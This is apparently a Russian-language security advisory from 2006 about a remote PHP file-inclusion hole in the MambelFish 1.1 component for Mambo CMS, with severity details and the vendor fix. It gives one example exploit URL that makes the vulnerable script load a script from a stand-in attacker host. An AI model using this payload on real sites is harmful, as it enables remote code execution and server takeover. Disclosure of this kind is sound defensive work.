PHP-инклюдинг в Mambo MambelFish

Дата публикации:
21.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
3109
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
MambelFish 1.x (компонент к Mambo)
Уязвимые версии: MambelFish (компонент Mambo) 1.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_mambelfish/ mambelfish.class.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://victim/[path]/administrator/components/com_mambelfish/
mambelfish.class.php?mosConfig_absolute_path=http://site.com/evilscript.txt?

URL производителя: mamboxchange.com/projects/mambelfish/

Решение: Установите последнюю версию (1.5) с сайта производителя.

Ссылки: Mambo mambelfish Component <= 1.1 Remote File Include Vulnerability

или введите имя

CAPTCHA